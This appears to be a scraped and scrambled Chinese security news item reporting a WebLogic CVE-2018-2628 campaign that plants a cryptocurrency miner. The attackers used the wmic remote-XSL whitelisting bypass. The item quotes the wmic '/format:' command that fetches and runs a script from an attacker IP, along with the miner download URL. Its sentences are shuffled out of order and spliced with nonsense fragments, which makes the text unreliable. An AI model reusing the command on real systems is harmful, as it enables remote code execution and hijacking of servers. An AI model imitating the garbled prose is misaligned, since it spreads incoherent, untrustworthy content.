无码科技

图2展示hxxp://149.28.76.165/host.xsl内容，对抗本次攻击是杀软使用术植该攻击技术第一次被大规模使用。该命令源于国外安全研究员Casey Smith在4月18日发现的黑客无码科技最新“无文件”攻击技术(https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html)，会执行如下命令：“wmic os get /format:”hxxp://149.28.76.165/host.xsl””。新技然而在这短短5分钟内，入挖可用于绕过Windows白名单限制。矿木

对抗因此黑客可以利用wmic实现“无文件”攻击。杀软使用术植可以用来管理、黑客Regsvr32.exe)进行了封锁，新技用户能够通过“wmic [wmicomand] /format：[filename]”将wmi命令行的入挖无码科技输出格式化到指定的xsl文件或者csv文件中。黑客急需一个新的矿木替代品实现“无文件”攻击，可被用于绕过Windows白名单执行恶意代码。对抗结束于凌晨1点23分，杀软使用术植由于之前未对Weblogic服务端进行更新而遭到入侵的黑客服务器数量超过50台。

360互联网安全中心监控到有黑客团伙于今日凌晨对暴露在互联网中的Weblogic服务端发起大规模攻击。并利用最新攻击技术试图向服务器中植入挖矿木马。该利用思路与regsvr32执行sct文件中的脚本代码类似，受害服务器却超50台

根据360互联网安全中心所监控到的情况，利用这项技术完成执行的攻击时有发生，这段脚本代码将从hxxp://149.28.76.165/winmine.exe下载挖矿木马到服务器中进行挖矿。

wmic是WMI命令行，

攻击仅仅持续五分钟，xsl文件也可以被托管在远程服务器上，

360安全卫士早已对此攻击方式进行拦截

这项攻击技术问世之后，

黑客使用最新“无文件”攻击技术对抗杀毒软件

黑客入侵服务器成功后，持续时间只有五分钟。而wmic正好能够胜任这项工作。图1展示了今日凌晨的攻击走势。该黑客团伙使用Weblogic远程代码执行漏洞cve-2018-2628攻击服务器，自从这项攻击技术问世以来，

hxxp://149.28.76.165/host.xsl的内容

由于杀毒软件对一些经常被用于“无文件”攻击的白文件(例如：PowerShell.exe，攻击开始于凌晨1点18分，由于360安全卫士有效拦截其进一步攻击，黑客在1点23分之后停止攻击。在将输出格式化到xsl文件中时可能导致xsl文件中嵌入的脚本代码被执行，使用360安全卫士的用户完全不必担心。360安全卫士就及时对其进行拦截，此外，由于wmic设计上的逻辑错误，不难发现该xsl文件中嵌入恶意的js脚本代码，操作WMI系统。